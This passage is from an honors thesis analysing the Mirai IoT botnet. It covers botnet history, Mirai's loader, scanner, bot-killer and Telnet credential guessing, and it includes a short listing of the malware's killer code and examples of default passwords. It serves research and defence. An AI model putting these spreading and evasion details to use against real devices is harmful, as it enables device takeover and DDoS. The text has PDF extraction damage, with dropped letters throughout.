Open Meghanriegel-Honorsthesis.Pdf

THE PENNSYLVANIA STATE UNIVERSITY SCHREYER HONORS COLLEGE

SCHOOL OF ELECTRICAL ENGINEERING AND COMPUTER SCIENCE

TRACKING MIRAI: AN IN-DEPTH ANALYSIS OF AN IOT BOTNET

MEGHAN CAROLE RIEGEL SUMMER 2017

A thesis submitted in partial fulfillment of the requirements for a baccalaureate degree in Computer Engineering with honors in Computer Engineering

Reviewed and approved* by the following:

Dr. Patrick McDaniel Distinguished Professor of Computer Science and Engineering Thesis Supervisor

Dr. Vijay Narayanan Distinguished Professor of Computer Science and Engineering Honors Adviser

* Signatures are on file in the Schreyer Honors College.

Abstract

Though botnets have been a security problem for a long time, they have recently begun taking advantage of the security vulnerabilities present in connected devices often referred to as the Internet of Things. Mirai, a botnet malware which emerged in mid-2016, has been responsible for the largest DDoS attack on record, a 1.2 Tbps attack on Dyn, a DNS provider. In late 2016, the source code for Mirai was released on a hacker forum. The goal of this thesis is to investigate Mirai, which is responsible for the largest botnets ever seen. We discuss its full functionality, focusing on how it spreads by taking advantage of weak authentication on devices. We take a look at the malware’s strengths and weaknesses and how it may be - and probably currently is being - modified and improved. We collected real Mirai trac in the wild and investigated how exactly it behaves so that we may distinguish between benign and malicious trac. We find that Mirai trac may be fingerprinted using deep-packet inspection and that it has evolved to attack more devices in the past several months. We then use these results to construct a picture of what the Mirai landscape currently looks like and where it is headed.

ii Table of Contents

List of Figures vi

List of Tables vii

Acknowledgments ix

Chapter 1 Introduction 1 1.1 SecurityandRiskintheInternetofThings ...... 2 1.2 TheMiraiBotnet...... 2

Chapter 2 Background & Related Works 4 2.1 History of Worms and Botnets ...... 5 2.1.1 Early Malware ...... 5 2.1.2 Sophistication of Malware ...... 6 2.1.3 Internet of Things Malware ...... 6 2.2 HowBotnetsWork...... 7 2.2.1 Spread...... 8 2.2.2 Infection...... 8 2.2.3 Command and Control ...... 8 2.2.4 Attack...... 9

Chapter 3 Mirai Source Code Analysis 10 3.1 Loader ...... 11 3.2 MiraiBot ...... 13 3.2.1 Initialization ...... 13 3.2.2 BotnetKiller ...... 13 3.2.3 Scanner ...... 14 3.2.3.1 Connection Algorithm ...... 14 3.2.3.2 Authentication Attempts ...... 15 3.2.4 Attacker...... 16 3.2.5 Constants Table ...... 17 3.3 Command and Control ...... 17 3.3.1 Initialization ...... 17 3.3.2 Admin Interface and API ...... 18 3.3.3 Attack...... 19 3.4 Mirai’s Pseudorandom Number Generator ...... 19 3.4.1 Randomness Analysis ...... 20

iii Chapter 4 Experimental Setup 22 4.1 ExperimentalSetup ...... 22

Chapter 5 Results and Discussion 24 5.1 Mirai-InfectedDeviceBehavior ...... 24 5.2 Mirai TracHeaders...... 25 5.2.1 IPv4 Header ...... 26 5.2.2 TCP Header ...... 27 5.3 Mirai TracPayload...... 27 5.3.1 Telnet Negotiation ...... 28 5.3.2 Linemode ...... 29 5.3.3 Timing ...... 29 5.3.4 CredentialsTried...... 29 5.4 Locations of Infected Devices ...... 30 5.5 TracFlows ...... 31 5.6 Distinguishing Mirai from Other Botnet Trac...... 32

Chapter 6 Conclusions & Takeaways 34 6.1 WhereWeAreNow ...... 34 6.2 ImprovementstoMirai...... 34 6.2.1 Scanning Strategies ...... 35 6.2.2 Packet Payload ...... 35 6.2.3 Default Password List ...... 35 6.2.4 New Vulnerabilities ...... 35 6.2.5 Attack Vectors & Monetization ...... 36 6.3 Takeaways...... 36

Appendix A Mirai Botnet Source Code Selections 38 A.1 Hackerforums Blog Post ...... 38 A.1.1 Preface ...... 38 A.1.2 Requirements...... 39 A.1.3 InfrastructureOverview ...... 40 A.1.4 Conﬁguring Bot ...... 40 A.1.5 Conﬁguring CNC ...... 41 A.1.6 Setting Up Cross Compilers ...... 41 A.1.7 Building CNC + Bot ...... 42 A.1.7.1 How to build bot + CNC ...... 42 A.1.8 Building Echo Loader ...... 42 A.2 CustomDataStructures...... 43 A.2.1 Connection Structure ...... 43 A.2.2 Scanner Connection Structure ...... 44 A.2.3 Command and Control Client List ...... 45 A.3 Constants Table ...... 46 A.4 Built-inEncodingandDecoding ...... 47 A.4.1 Encoding Functionality ...... 47 A.4.2 Decoding Functionality ...... 49

iv Appendix B Supplemental Data 51 B.1 Hardcoded List of Default Credentials ...... 51 B.2 CredentialsSeeninCollections ...... 53 B.3 Attack Types and Flags ...... 57 B.4 DieharderTestOutput...... 59

Bibliography 65

v List of Figures

1.1 MiraiTimeline ...... 3

2.1 Timeline of Notable Malware ...... 5 2.2 AGeneralBotnetStructure...... 7

3.1 TheMiraiBotnetStructure ...... 11 3.2 The Mirai Loading Algorithm ...... 12 3.3 The Mirai Scanning Algorithm ...... 15 3.4 The Mirai Command and Control Structure ...... 18 3.5 The Mirai Random Number Generator ...... 20

5.1 Conventional IoT Device Behavior ...... 24 5.2 Mirai-InfectedIoTDeviceBehavior...... 25 5.3 Benign IPv4 Header [Wireshark] ...... 26 5.4 Mirai IPv4 Header [Wireshark] ...... 26 5.5 Benign TCP Header [Wireshark] ...... 27 5.6 Mirai TCP Header [Wireshark] ...... 27 5.7 TelnetSession...... 28 5.8 MiraiTelnetSession ...... 28 5.9 Attack Source Heat Map ...... 30 5.10 Input-Output Graph Device 1 (April 30 - May 1) ...... 31 5.11 Input-Output Graph Device 2 (April 30 - May 1) ...... 31 5.12 Input-Output Graph Device 2 (May 3 - May 4) ...... 32

vi List of Tables

5.1 Top 10 Source Countries ...... 31

B.1 Default Credentials Used by Mirai ...... 53 B.2 CredentialsSeeninCollections ...... 57 B.3 AttackFlags ...... 58 B.4 AttackTypes ...... 59

vii Listings

3.1 KillerMemorySearch ...... 13 3.2 Attack Initialization ...... 16 3.3 Mirai’s Pseudo-Random Number Generator ...... 19 5.1 Packet Header Initialization ...... 25 A.1 ConnectionStruct ...... 43 A.2 ScannerConnectionStruct ...... 44 A.3 CNCClientListStruct ...... 45

viii Acknowledgments

I want to thank everyone who helped make this thesis possible, because without them, I would not be graduating with a Master’s degree. First, to my adviser, Dr. Patrick McDaniel, who guided me through my research and provided signiﬁcant levels of support. Second, to the rest of the faculty and stain the Department of Computer Science and Engineering at Penn State for their support and help answering my myriad of questions, especially Dr. Adam Smith and Dr. Vijay Narayanan, my honors adviser. Third, to my family - Mom, Dad, Lauren and Carolyn - for always pushing me to work harder and without whom I would never have pursued the Integrated Undergraduate-Graduate program and received my Master’s degree. I think you all loved my extra football season just as much as I did. Finally, I need to thank my fellow graduate students and my friends. You were always willing to spend long nights with me in the lab, the library, or, most often, Willard. You were willing to impart you speciﬁc knowledge on subjects I was not clear on, yet needed to understand in order to complete this thesis. Tech: Thank you for keeping me sane this year when I most needed it!

ix Dedication

To My Parents.

Mom and Dad, thank you for not only convincing me to attend Penn State and to join the Schreyer Honors College, but for always supporting me and pushing me to do better. I would not be in the place that I am today without you there every step of the way.

I love you!

x Chapter 1 | Introduction

Someone has a botnet with capabilities we haven’t seen before. We looked at the trac coming from the attacking systems, and they weren’t just from one region of the world or from a small subset of networks - they were everywhere.

Martin McKeay - Akamai

The introduction of connected embedded devices - the so-called Internet of Things (IoT) - has already begun to change the landscape of the Internet. This paradigm shift has the potential to provide us with a plethora of new opportunities and new challenges. In 2008, the National Intelligence Council cited the Internet of Things as one of "Six Technologies with Potential Impacts on US Interests out to 2025" [1]. We will be able to, and in many cases already can, collect information from everyday objects that are connected to the Internet. For example, in the past two years, the popularity of home automation has exploded. As of November 2016, an estimated 5.1 million Amazon Echo units had been sold to date [2], which is expected to increase substantially, even with the introduction of the Google Home and the announcement of Apple’s competitor product. These products are meant to control the multitude of home automation products available, an exploding market including Hue lightbulbs, Nest security products and thermostats, Samsung refrigerators, and more. Even our vehicles are joining the Internet of Things, with an estimated 75% of shipped cars in 2020 having some kind of Internet connectivity and an estimated $42 billion autonomous-car industry in 2025 [3]. The Internet of Things doesn’t stop there. We are using connected sensors and embedded devices to monitor agriculture, improve manufacturing, closely track human health, and build smart cities. It is and will be pervasive in almost every industry in both the public and private sector and is expected to be a $470 billion industry by 2020 [4], with an estimated 20.8 billion devices connected in that year [5].

1 1.1 Security and Risk in the Internet of Things

With the massive potential of the Internet of Things comes immense risk, particularly in the area of security. Here, we define a secure device as one that maintains confidentiality, integrity, and availability (often referred to as the CIA triad) of the device and the information it holds and transmits. Modern PCs, conversely are generally very powerful, updated constantly, and are able to utilize "computationally-secure" cryptographic schemes to maintain confidentiality and integrity of data. Companies that develop their operating systems, like Google, Apple, and Microsoft, build them with security at the forefront. They, along with a wide variety of researchers, have developed good protocols over the past several decades that ensure their systems are secure and work well. Most of the time, exploits against PCs utilize zero-day vulnerabilities or take advantage of weak security practices employed by users. There are hundreds of researchers that are actively improving operating systems and programs to eliminate these vulnerabilities and to improve security usability. Hundreds more are working to educate users on the importance of security and how to be safer online. The security landscape of the Internet of Things is completely dierent, partially because connected devices are fundamentally dierent than PCs. These devices are often simple, with a small set of specific functionality. For years, there was no need for security, because they operated in closed systems that could not feasibly be compromised. Now, they are going online and manufacturers are not paying any attention to their security, either because they do not care or their developers do not understand how to implement good security. Many devices use weak default passwords and broken cryptographic protocols. To make matters worse, as such devices are fundamentally simpler - and dierent - than a PC, many widely agreed upon protocols will not work or do not make sense in this new context. The popularity of IoT is exploding too quickly, before security researchers have gotten a chance to catch up. Finally, IoT devices have long shelf-lives and are updated much less frequently than a PC would be - if ever. Considering all of this, IoT has become an extremely attractive - and successful - target for adversaries.

1.2 The Mirai Botnet

On September 20th, 2016, the website Krebs on Security was hit with a DDoS attack by what would become known as the Mirai (Japanese for "the future") botnet [6]. It was the largest DDoS attack ever recorded at over 600 Gbps in size. It was apparent that the attack was carried out by a botnet, as is typical in DDoS attacks. However, this one was comprised of Internet of Things devices, including routers, IP cameras and digital video recorders (DVRs). Less than 2 weeks later, the source code [7] was released on a hacker forum by its supposed author: codename Anna-senpai. It was found to attack IoT devices by brute-force guessing from a hard-coded list of default device usernames and passwords over the Telnet protocol. A few weeks after the release of the Mirai source code, an even large attack was executed on the DNS service provider Dyn [8]. Several high-proﬁle sites went oine, including GitHub, Airbnb, Twitter, Netﬂix, and Reddit. Reaching over 1Tbps, it was the largest attack ever recorded. It was later announced that the attack was caused in part by the Mirai botnet, encompassing millions of bots. Now, Mirai has been found to be so prevalent that even if one resets a device, wiping the malware from memory, the device is expected to be re-infected again within minutes, unless the password is changed. In October 2016, white-hat hackers began with some vigilante justice to combat Mirai. Hajime is a botnet that attacks the same vulnerabilities as Mirai. Instead of using the devices to attack, it shuts down some of the ports so that Mirai cannot compromise the device [9]. Unfortunately, vigilante justice is rarely the answer. We cannot trust that this botmaster will never use these bots for malicious purposes, nor that he won’t lose control of the botnet.

Figure 1.1. Mirai Timeline

Mirai has forced us to consider the security of the Internet of Things more seriously. The prevalence of connected homes is accelerating yet we have no real solution to the security problem. Scarier still is the notion that it won’t be long before attacks leave the digital world and enter the physical world. Insecure systems make it possible for attacks on our electric grid, on manufacturing systems or on food production systems to threaten our livelihoods. In this thesis, we attempt to begin this conversation through the light of the Mirai problem. We investigate the malware’s source code, focusing on how it spreads to new hosts. We collect malicious trac from the wild in order to learn exactly how it behaves and perhaps what variants have evolved. Then, we attempt to distinguish between malicious and benign trac on the telnet port and provide suggestions for improving device security. Finally, we anticipate what Mirai will do next by looking at our results and at malware evolution in history. Chapter 2 | Background & Related Works

This was not a mistake. He wanted his worm to run on computers all over the United States.

Ellen R. Meltzer - Federal Prosecuter - US vs. Morris

While this thesis explores the Mirai botnet in depth, it is useful to briefly investigate and discuss the malware that preceded it. Then, it may be possible to gain a better understanding of where we are now. From the beginning, computers have attracted the innovative, the curious, and the malicious. Computers and the Internet have always been a source of discovery, of intelligence, and of profit. Malware has been a part of the story from the beginning. Like the many varieties of malware, worms are so-named to reflect they way they act in the natural world. Parasitic worms, known collectively as helminths [10], are standalone organisms that live in a host and steal the food they consume for nourishment. They are able to spread themselves and infect other hosts. Similarly, a worm in the computing world is a standalone piece of software that is able to spread to new vulnerable hosts using a variety of methods. Oftentimes, especially in the context of their use in botnets, they cripple their hosts and/or steal computing resources from their hosts to execute attacks, like DDoS attacks. Botnets are networks of zombie computers that are controlled by a so-called "botmaster" to execute attacks or carry out illicit activities, such as executing DDoS attacks, sending spam emails, or collecting confidential information. They are oftentimes a product of worms, though it is not unheard of for botnets to be created using viruses or Trojans. A virus, like a worm, is so-named for its biological counterpart. Viruses are small, cell-level parasites that attack by changing the DNA in a cell, changes which are carried over when the cell replicates. A computer virus, in the same vein, will infect a computer by inserting itself into another program. When the program is executed, the virus is as well. A Trojan is named for the wooden horse that was used in the Greek assault on Troy. It is malware that is designed to look legitimate - a software update, for example. Trojans tend to rely more on social engineering to spread, unlike worms or viruses [11].

4 2.1 History of Worms and Botnets

Figure 2.1. Timeline of Notable Malware

2.1.1 Early Malware

The decades-long battle against malware really started in 1988, with the Morris worm. This worm was the first major worm to infiltrate the Internet and was the first to execute a denial-of-service attack. Oddly, this worm originated more from curiosity for a proof-of-concept Internet-wide worm than from malice. Robert Morris was a graduate student at Cornell and, according to him, wrote the worm to estimate the size of the Internet. Then, the Internet was comprised of roughly 60,000 machines and the Morris worm infected an estimated 10% of them. It spread in a tree structure: exploiting a machine and then trying its neighbors. In particular, it utilized password-guessing attacks, which would remain a popular exploit in worms into modern day. The Morris worm spread so well, almost too well, that it would crash machines, as it would infect a single computer so many times that the computer wouldn’t have the resources to do anything else. It took technicians several days to remove the worm oof networks and it showed the research community that malware is in fact a concern, and that security should be a priority [12]. In early 2000, the infamous ILOVEYOU worm was the first major adversarial worm to severly cripple the Internet. Written by a student in the Philippines, the malware was sent via email in the attachment "LOVE-LETTER-FOR-YOU.TXT.vbs", which, when opened, immediately executed, overwriting files and sending itself to other users [13]. It didn’t take long for email clients to block directly-executable attachments like VBScript; programmers and users learned to be wary on the Internet. However, malware writers also learned, continuing a cat-and-mouse game that would continue to today and will continue into the future. A year later, the Code Red worm appeared in the wild. It compromised a vulnerability on Microsoft’s Internet Information Services web servers that had been announced a month prior. Once on a host, it would spread by generating 100 threads and trying to attack the same vulnerability on IP addresses via port 80. The worm was very successful. Later analysis showed that the rate of spread first grew exponentially and then slowed as the set of vulnerable hosts on the Internet was saturated [14]. Such spread models are very typical worms, at it would be for any illness in the physical world [15], and it is only the acceleration of spread that improves, as will be shown later. In the early stages of the spread of CodeRed, each server was able to infect 1.8 victim servers per hour. Oddly, CodeRed turned itself oafter nearly a day and re-awoke a few weeks later, a trend that would also be repeated in other malware. Not long after the emergence of Code Red, two new worms appeared: Code Red II (though its code base was unrelated to Code Red) and Nimda. Code Red II had a localized spread, meaning it was more likely to try IP addresses nearby rather than random addresses across the Internet.

2.1.2 Sophistication of Malware

In 2003, the Internet saw, for the first time, a worm that spread too quickly for humans to eectively intervene. The Slammer worm spread so quickly that it infected 90% of vulnerable hosts within 10 minutes. It exploited a buer overflow vulnerability in devices running Microsoft’s SQL server [16]. Just as in the Code Red incident, this vulnerability was patched prior to the incident, though many vulnerable hosts still resided on the network. At its peak, the worm was achieving a scan rate of over 55 million hosts per second and saturated many networks’ bandwidth, causing widespread outages. First detected in early 2007, the Storm worm and botnet emerged, named for the subject line of the spam emails it would send, a method that was similar to the early ILOVEYOU worm. However, Storm was notable because it was one of the first (and one of the most successful) worms to utilized decentralized control servers, which makes it harder to shut down. [17] Prior to this development, botnets like Slammer would connect to an Internet Relay Chat (IRC) channel set up by the attacker to receive commands and updates. Slammer and Storm, along with many other worms at the time, were malicious, but had the main goal of disrupting the Internet and communiciation via DDoS attacks. March 2008 brought Torpig, an insidious Trojan horse that sought to steal sensitive information, like passwords and credit card numbers, for financial gain. It was not the first piece of malware to do so, but the financial damage it caused was unparalleled at the time [18].

2.1.3 Internet of Things Malware

In June 2010, a new type of worm was detected that targeted physical systems. Stuxnet targeted Iran’s nuclear program and was responsible for destroying 20% of the country’s nuclear centrifuges. It entered the system via a thumb drive was able to destroy the centrifuges while making the monitoring system show normal functionality. [19] While Stuxnet targeted a very speciﬁc type of device, it could be tailored to attack essentially any modern SCADA device. In 2013, the ﬁrst so-called Internet of Things botnet malware appeared. Linux-Darlloz compromised a PHP http POST vulnerability that was present on many IoT devices [20]. In 2015, BASHLITE (also called qbot) gained access to devices via insecure default credentials and compromised a vulnerability in the bash shell to exploit devices running BusyBox [21]. Not long after, the source code was released and by 2016, around one million devices were infected, over 96% of which were IoT devices. In 2016, Mirai appeared. It attacks the same devices as BASHLITE using very similar tactics. It may in fact be a variant on BASHLITE, but due to its ability to erase other malware from the devices it tries to infect, it has been responsible for the largest botnets ever amassed and the largest DDoS attacks ever recorded.

2.2 How Botnets Work

Figure 2.2. A General Botnet Structure

Botnets are large networks of computers controlled by an adversary that are used for nefarious purposes, including distributed denial-of-service attacks, spam, theft, and espionage. The vast majority of botnets are created using worms that spread across networks, connecting computers to a central command-and-control. While many early worms - and in fact some modern malware - tend to cause noticeable damage on computers almost immediately, modern botnets are more inconspicuous. Botmasters - a malicious user who controls the botnet - want to amass networks of hundreds of thousands of nodes in order to attack a target whenever they please. If a user does not know that their machine is part of a botnet, the botmaster can continue to ﬂy under the radar and continue to appear disconnected from their crimes. Though botnets have evolved in the past few decades, and though modern botnets exist in a variety of families, the core functionality of a botnet is consistent. 2.2.1 Spread

The primary goal of any botnet is to spread to as many hosts as possible so that attacks are more eective. Spreading quickly without detection is a core problem that a botnet designer faces. A few worms will spread using social engineering methods, like convincing a user to open a malicious email attachment or navigate to a malicious website, while others are found on ﬁle sharing (P2P) websites [22]. While such methods are eective, the proliferation rate is limited by the humans spreading them. More eective spreading can be achieved without human interaction, by scanning for vulnerable IPs and attacking them. Early worms targeted devices randomly. They used a random number generator to generate lists of IP addresses and attempted to exploit them. [14] found that Code Red spread exponentially but slowed the more saturated the malware became. Code Red II exploited the same vulnerability as Code Red I but had a more ﬁne-tuned IP address selection process, targeting nearby devices more often instead of spreading randomly across the internet.

2.2.2 Infection

Typically, an attacker is targeting a particular vulnerability in a device. This could be anything, and is often a zero-day vulnerability, as computers and servers, the traditional target for botnets, typically implement relatively adequate security. In the case of BASHLITE and Mirai, the insecure security implementation - the use of default credentials - is exploited. Once inside the target device, the attacker will download the binary to it.

2.2.3 Command and Control

Botnets are useless unless a botmaster is able to control it and execute commands. Traditionally, bots connect to a central command and control server. This is the case with Mirai. In the early years of botnets, the addresses of these servers were changed very rarely in order to make it easier for bots to connect and less likely they will be orphaned. However, the longer the address is static, the easier it will be for law enforcement to ﬁnd the C&C server and take it down. Modern botmasters typically change the server too often to be accurately tracked - or for it to be worth taking down - requiring bots to be more active in connecting and updating the location of the C&C. The vast majority of botnets in the past have used the Internet Relay Chat (IRC) to communicate with a central command-and-control server, which is an application layer communication protocol [23]. It is useful to discuss another command and control strategy often used. Peer-to-Peer botnets utilize a more decentralized command and control. Instead of one C&C server, P2P botnets contain a large number of workers that distribute the control. New bots joining the botnet simply connect to these bots. This setup allows the botnets to be much more robust against inﬁltration as losing a worker on the botnet does not dismantle the whole system. Furthermore, it makes it easier for the botnets to evade detection. 2.2.4 Attack

Botnets have been used for a wide variety of nefarious purposes. One of the most common uses, as is in the case of Mirai, is to execute DDoS attacks. Recently, the security community has seen a upward trend in DDoS-for-hire services. It used to be that an adversary who wants to execute a DDoS attack would have to build their own botnet to do so. Now, for around $40, you can get one hour of DDoS attacks; there are even tons of subscription plans available! These services are widely available via a regular Google search and can be purchased with a PayPal account. Incapsula reports that a lot of them market themselves as stress test services to avoid suspicion from law enforcement [24]. While big DDoS attacks like the one seen on Dyn have increasingly occurred, so have smaller DDoS attacks. A report by A10 Networks says that more than 3700 DDoS attacks occur every day, 93% of which are reliant on DDoS-for-hire services [25]. In fact, in December 2016, 34 individuals were arrested, and a further 101 individuals were warned, in a crackdown on DDoS-for-hire [26]. DDoS attacks are not the only use for botnets. Spam and phishing emails are largely sent with the help of large botnets and are responsible for 95% of all emails [27]. Some botnets are also used for widespread personal information collection and identity theft. Botnets can install keyloggers to collect secret user information, like passwords and credit card information. They can snitrac and learn a lot about users. Chapter 3 | Mirai Source Code Analysis

Today, I have an amazing release for you.

Anna-senpai - Mirai Author

Mirai creates large, resilient, and highly capable IoT botnets that can carry out some of the largest DDoS attacks ever seen. In early October 2016, the Mirai source code was released by its apparent author, Anna- senpei [7] [28]. In a blog post, he mentions the release is due to increased scrutiny by law enforcement (in his words: "there’s lots of eyes looking at IOT now, so it’s time to GTFO."). Releasing the source code of malicious programs is not uncommon for authors becoming nervous about getting caught. It helps shift the attention away from them; if they are not the only user with the code, it makes them appear less guilty to law enforcement [29]. The supposed identity of Anna-senpei was later revealed by Krebs to likely be a student named Paras Jha at Rutgers University, though the investigation is still ongoing [29]. The Mirai source code is primary written in C while the command and control is written in Go. In total, the repository investigated contains over 12,000 lines of code in 144 files. Analyses of Mirai have been numerous both before the release of the source code and since [30]. While analyses vary, it is estimated that Mirai builds on previous botnet malware and even previous IoT botnet malware such as BASHLITE [29]. BASHLITE, which appeared in 2014, utilizes the same vulnerabilities as Mirai - default credentials. Mirai’s functionality is very straightforward. See Figure 3.1 for an overview of the structure of a Mirai botnet. It spreads by attempting to connect to randomly selected devices via the Telnet port and then guessing the username and password from a hardcoded list of default credentials (see Table B.1 in Appendix B.1). Most of the credentials found in this list are either exceedingly common (e.g. root:password) or are specific to a manufactuer or device (e.g. root:realtek is a username:password combination for Realtek routers) All of these combinations are likely to target a variety of cameras, routers, DVRs, printers, and more [31]. If Mirai logs in successfully, it downloads the Mirai binary, connects to command and control, and begins spreading to additional hosts. The spreading technique is not new. Botnets have been employing vastly similar techniques since the first ones appeared over ten years ago. Even the

10 attack method of guessing passwords has been around since as late as the Conﬁcker worm in 2008. In addition, it was not even the ﬁrst piece of malware to attack notoriously insecure IoT devices. What makes Mirai unique is that it was able to corner the market on IoT botnets. It has the ability to not only infect an IoT device, but to delete pre-existing malware on that device. As such, it is able to make its botnet stronger while weakening other currently active botnets. This is readily apparent, as Mirai is responsible for some of the largest DDoS attacks ever recorded. Please note that instances of Mirai in the wild are likely to dier from the source code, as many hackers likely took this code and made improvements or changes. The general functionality of this botnet is likely to be prevalent in the wild, as it is a simple and eective way to take control of the multitude of vulnerable IoT devices online. Trends show that the number of these devices is likely to increase, as manufacturers are paying little attention to security and governments are not mandating it.

Figure 3.1. The Mirai Botnet Structure

3.1 Loader

A device found to be vulnerable to Mirai will be attacked and recruited to join the botnet. The loader is a server separate from the Mirai instances on the individual bots, as sending the binary is very resource intensive. As discussed in section 3.2.3, the bots send authentication information for vulnerable devices to the loader, which carries out the attack. They connect to the loader in the same way they connect to the command and control server (see below). Bots resolve a domain stored in a hardcoded, obfuscated table. Botmasters can easily move the server often to avoid detection. See Figure 3.2 below for a graphical representation of the Mirai Loader.

Figure 3.2. The Mirai Loading Algorithm

When the loader server is initialized, it creates a designated number of so-called workers (threads), 58 by default. Each of these threads will handle attacking a dierent victim device, which is called an event in the code. The loader listens for the device information from the bots, which is sent in the format ip:port username:password) on stdin. When information is received, it is parsed and an attack is added to the attack queue. A thread picks it up and creates a connection structure for the connection instance. It attempts to connect to the device via the Telnet port with the specified credentials, keeping track of the state of the Telnet negotiation process. Once logged into the device, the worker now needs to learn the device’s architecture and how it can most eciently exploit it. Unfortunately for victims, Mirai, once authenticated via Telnet, is able to issue bash commands to the device using BusyBox. BusyBox is an embedded system utility that is often referred to as the "Swiss army knife of embedded systems". It combines several common Unix commands - like ls, rm, and echo to name a few (see [32] for the full list) - into one small binary. BusyBox is very modular and a user can pick and choose what features to install onto the device, while still keeping the binary tiny. This makes it very attractive for designers of devices like routers; one can interact with the device using familiar commands while keeping the power low and size small. Embedded devices are, more often than not, much simpler than a typical personal computer. As such, they usually do not have all of the packages that a complex device will have. Mirai is able to account for such cases and attack even the simplest of devices. The typical method for many Linux computers to download a binary is using wget, and some others use tftp (Trivial File Transfer Protocol). Extremely simple and resource-limited devices have neither, which makes it much more dicult to send files and download binaries to the device. When attacking a device, after discovering the architecture, Mirai checks whether it has wget or tftp installed. If so, it uses those programs to download the Mirai binary to the victim device. Once the loader verifies the download is successful, the Telnet connection is closed and the new bot proceeds with initialization described in section 3.2.1. Mirai is still able to spread to very simple devices that have neither wget nor tftp installed. It uses the echo command to install a small binary that downloads the real binary. Mirai does this instead of echo loading the entire binary directly in order to free up resources on the loader and save time. This process is described by the author in Appendix A.1.8.

3.2 Mirai Bot

The ﬁles in the bot directory within the mirai directory are responsible for the bulk of the functionality for an actively spreading bot. Contained in this directory are the Killer (Section 3.2.2), Scanner (Section 3.2.3), and Attacker (Section 3.2.4).

3.2.1 Initialization

The instance of the Mirai bot on a device is initialized in main.c within the bot directory. Mirai is loaded into memory on the device, so the ﬁrst thing it does is obfuscate its process names on the machine to make it more dicult to be detected. It then will ping the watchdog to ensure that the device is not rebooted. Next, Mirai makes sure it is the only malware running on the device by killing any pre-existing malware. See Section 3.2.2 for a full discussion of this process. Anecdotal references have shown that this likely works well. In a dierent blog post by Anna-senpai, he brags that he wrote a Telnet bot killer, and the comments by other hackers seemed to conﬁrm his boasting [29] [33]. Mirai then initializes the attack, kill and scan functionality, all of which are described below. Once everything is initialized, it connects to the command and control server by resolving a domain hardcoded in the program. As long as the adversary keeps the domain but changes the actual server address, they can avoid researchers who attempt to track down the server and shut down the bot.

3.2.2 Botnet Killer

Mirai, once installed on a device, will initialize a killer that targets other malware trying to run on the device. This is a feature that is not present on any previous IoT botnets. It kills the services running on port 23 (Telnet), 22 (SSH), and 80 (HTTP). Every KILLER_RESTART_SCAN_TIME, all processes running on the device are scanned in order to search for - and kill - competing malware.

Listing 3.1. Killer Memory Search 1m_qbot_report=table_retrieve_val(TABLE_MEM_QBOT,&m_qbot_len); 2m_qbot_http=table_retrieve_val(TABLE_MEM_QBOT2,&m_qbot2_len); 3m_qbot_dup=table_retrieve_val(TABLE_MEM_QBOT3,&m_qbot3_len); 4m_upx_str=table_retrieve_val(TABLE_MEM_UPX,&m_upx_len); 5m_zollard=table_retrieve_val(TABLE_MEM_ZOLLARD,&m_zollard_len); 6 7 while (( ret = read(fd , rdbuf , sizeof (rdbuf))) > 0) 8{ 9 if (mem_exists(rdbuf , ret , m_qbot_report, m_qbot_len) || 10 mem_exists(rdbuf, ret, m_qbot_http, m_qbot2_len) || 11 mem_exists(rdbuf, ret, m_qbot_dup, m_qbot3_len) || 12 mem_exists(rdbuf, ret, m_upx_str, m_upx_len) || 13 mem_exists(rdbuf, ret, m_zollard, m_zollard_len)) 14 { 15 found = TRUE; 16 break ; 17 } 18 }

The source code released targets a piece of malware called Kami (aka Anime). Kami is also a Telnet botnet that attacks using hardcoded credentials. It resides in a folder called .anime, which Mirai searches for [34]. If found, Mirai kills the process. In addition to searching for Kami, Mirai targets 3 varieties of Qbot (BASHLITE) which was discussed earlier. It targets Darlloz, which is a PHP botnet that targets IoT and ﬁrst appeared in 2013. Darlloz also operates on port 23 [20] and exploits a PHP http POST request vulnerability that was discovered in 2012.

3.2.3 Scanner

Mirai’s scanning method is rather typical for a worm. It is sub-optimal for quick network saturation, as the method for choosing IP addresses to target is completely randomized. The author does however, in Appendix A.1.3, argue that the scanning algorithm is much faster than competing IoT botnets. This could be due to the fact that the scanning process is multithreaded and the most resource intensive aspect of the process - loading the binary on the device - is done by the more powerful loader server. Once Mirai is installed onto a device, it attempts to scan for new hosts to attack. The default configurations allows for 128 simultaneous connections, which are stored as a list of custom-defined type scanner_connection, as defined in Appendix A.2.2 in Code Listing A.2. Each packet sent by the scanner uses and updates the values in that connection’s struct. Mirai uses the fd_set package [35], which allows it to simultaneously monitor file descriptors for input, output, and exceptions. Most of the Mirai code only monitors input and output, including the scanner. As such, it is important to note that while the process below describes the scanner as sending packets and waiting for responses, in reality, Mirai is doing all of these simultaneously and across multiple connections. Also note that variants of Mirai in the wild are likely to scan slightly dierently.

3.2.3.1 Connection Algorithm

For each connection, Mirai generates a random destination IP address and usually attempts to ping port 23, which is the Telnet port. Every 10th connection pings port 2323, which is commonly used by IoT devices as an alternate Telnet port. Mirai implements its own IP address generation Figure 3.3. The Mirai Scanning Algorithm

algorithm which avoids some reserved address spaces as well as those of Hewlett Packard, General Electric, the US Postal Service, and the Department of Defense. In this ﬁrst connection attempt, Mirai sends a SYN packet, the ﬁrst part of a common 3-way-handshake, and waits for a SYN-ACK from the device. If such a response is received, Mirai begins the next step of it’s attack process, to determine whether the Telnet port is a vulnerable one to Mirai, i.e. if the bot is able to successfully authenticate using username/password pairs from its table of default credentials. See Table B.1 in Appendix B.1 for the whole list. Mirai negotiates a Telnet connection and updates the connection state (see Code Listing A.2 - lines 11-23) in response to the packets from the device. When a username or password is required, the bot sends one of the credentials from the previously stated table. If unsuccessful, the connection loads a new set of credentials and connects to the device once again and attempts to negotiate the Telnet connection. After unsuccessfully trying 10 username/password combinations, the bot ceases to attack the device and cuts the connection. If, however, the credentials were correct, the results are sent to a server which forwards them to the loader.

3.2.3.2 Authentication Attempts

It is worth discussing that Mirai obfuscates the authentication combinations it attempts. While the authentication table is hard-coded, it would be dicult for a researcher doing static analysis of the binary to determine which combinations are attempted. The code includes a tool to encode strings using a hard-coded key, 0xdeadbeef by default (see Appendix A.4.1). However, it is extremely likely that an adversary creating their own botnet would change this string, making analysis of the binary slightly more dicult. As seen in Appendix A.4.2, when the table of authentication combinations is created in memory during initialization, the combinations are deobfuscated. They are each assigned a weight speciﬁed by the user, which aects how likely it is to be chosen to be used in an attack.

3.2.4 Attacker

